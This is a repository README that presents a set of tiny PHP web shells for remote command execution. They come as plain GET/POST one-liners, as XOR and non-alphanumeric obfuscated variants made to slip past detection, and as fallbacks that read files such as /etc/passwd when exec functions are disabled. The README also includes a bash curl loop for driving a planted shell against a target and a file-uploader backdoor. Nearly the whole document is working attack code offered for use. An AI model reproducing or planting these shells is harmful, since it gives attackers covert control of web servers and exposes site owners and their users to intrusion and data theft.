├── README.md
├── backdoor.PNG
├── cli.PNG
└── obfusecate.PNG


/README.md:
--------------------------------------------------------------------------------
  1 | 
  2 | # Simple PHP Web Shell
  3 | 
  4 | 
  5 | ### Simple HTTP Requests GET Method Shell
  6 | ```
  7 | <?=`$_GET[0]`?>
  8 | 
  9 | [*] Usage: http://target.com/path/to/shell.php?0=command
 10 | ```
 11 | 
 12 | ### Simple HTTP Requests POST Method Shell
 13 | ```
 14 | <?=`$_POST[0]`?>
 15 | 
 16 | [*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command"
 17 | ```
 18 | 
 19 | ### Support GET and POST Requests Method
 20 | ```
 21 | <?=`{$_REQUEST['_']}`?>
 22 | 
 23 | [*] Usage:
 24 |  - http://target.com/path/to/shell.php?_=command
 25 |  - curl -X POST http://target.com/path/to/shell.php -d "_=command"
 26 | ```
 27 | 
 28 | # Simple Obfuscated PHP Web Shell
 29 | 
 30 | ### Obfuscated PHP Web shell Example
 31 | ```
 32 | <?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
 33 | 
 34 | [*] Usage: http://target.com/path/to/shell.php?0=command
 35 | [*] Note: This is obfuscation of <?=`$_GET[0]`?>
 36 | ```
 37 | 
 38 | ### Non-alphanumeric obfuscation PHP Web Shell
 39 | ```
 40 | <?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
 41 | 
 42 | [*] Usage: http://target.com/path/to/shell.php?_=function&__=argument
 43 | [*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls
 44 | ```
 45 | 
 46 | ### Another Example Obfuscation of Simple PHP Webshell
 47 | ```
 48 | <?php $_=${'_'.('{{{' ^ '<>/')};$_[0]($_[1]); ?>
 49 | <?php $_=${'_'.('{'^'<').('{'^'>;').('{'^'/')};$_[0]($_[1]); ?>
 50 | 
 51 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument
 52 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls
 53 | ```
 54 | 
 55 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
 56 | ```
 57 | <?php $_=${'_'.('{{{' ^ '<>/')};$_[0]($_[1]($_[2])); ?>
 58 | <?php $_=${'_'.('{'^'<').('{'^'>;').('{'^'/')};$_[0]($_[1]($_[2])); ?>
 59 | 
 60 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument
 61 | [*] E.g.:
 62 |     - http://target.com/path/to/shell.php?0=var_dump&1=scandir&2=.
 63 |     - http://target.com/path/to/shell.php?0=print_r&1=file_get_contents&2=/etc/passwd
 64 | ```
 65 | 
 66 | ### Without Space Obfuscation PHP Web Shell
 67 | ```
 68 | <?=$_=${'_'.('{{{'^'<>/')};$_[0]($_[1]);?>
 69 | 
 70 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument
 71 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls
 72 | ```
 73 | 
 74 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
 75 | ```
 76 | <?=$_=${'_'.('{{{'^'<>/')};$_[0]($_[1]($_[2]));?>
 77 | 
 78 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument
 79 | [*] E.g.: http://target.com/path/to/shell.php?0=print_r&1=glob&2=*
 80 | ```
 81 | 
 82 | ### Without Space and Non-alphanumeric Obfuscation PHP Web Shell
 83 | ```
 84 | <?=$_=${'_'.('{{{'^'<>/')};$_['__']($_['___']);?>
 85 | 
 86 | [*] Usage: http://target.com/path/to/shell.php?__=function&___=argument
 87 | [*] E.g.: http://target.com/path/to/shell.php?__=system&___=ls
 88 | ```
 89 | 
 90 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
 91 | ```
 92 | <?=$_=${'_'.('{{{'^'<>/')};$_['__']($_['___']($_['____']));?>
 93 | 
 94 | [*] Usage: http://target.com/path/to/shell.php?__=function1&___=function2&____=argument
 95 | [*] E.g.: http://target.com/path/to/shell.php?__=var_dump&___=scandir&____=/
 96 | ```
 97 | 
 98 | # Simple Bash Script For Handle Simple PHP Backdoor
 99 | 
100 | ```
101 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl $1$cmd;done
102 | ```
103 | with url encode:
104 | 
105 | ```
106 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl -G $1 --data-urlencode "0=$cmd";done
107 | ```
108 | 
109 | save into cli.sh and give access to execute with ```chmod +x cli.sh```
110 | 
111 | [*] Usage:
112 | ```
113 | ./cli.sh http://target.com/path/to/shell.php?0=
114 | ```
115 | 
116 | <center>
117 |   <img src="cli.PNG">
118 |   <img src="backdoor.PNG" width="50%" height="50%">
119 |   <img src="obfusecate.PNG" width="50%" height="50%">
120 | </center>
121 | 
122 | <h1>File Uploader Backdoor</h1>
123 | 
124 | ```
125 | <?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>
126 | ```
127 | 
128 | 


--------------------------------------------------------------------------------
/backdoor.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/backdoor.PNG


--------------------------------------------------------------------------------
/cli.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/cli.PNG


--------------------------------------------------------------------------------
/obfusecate.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/obfusecate.PNG


--------------------------------------------------------------------------------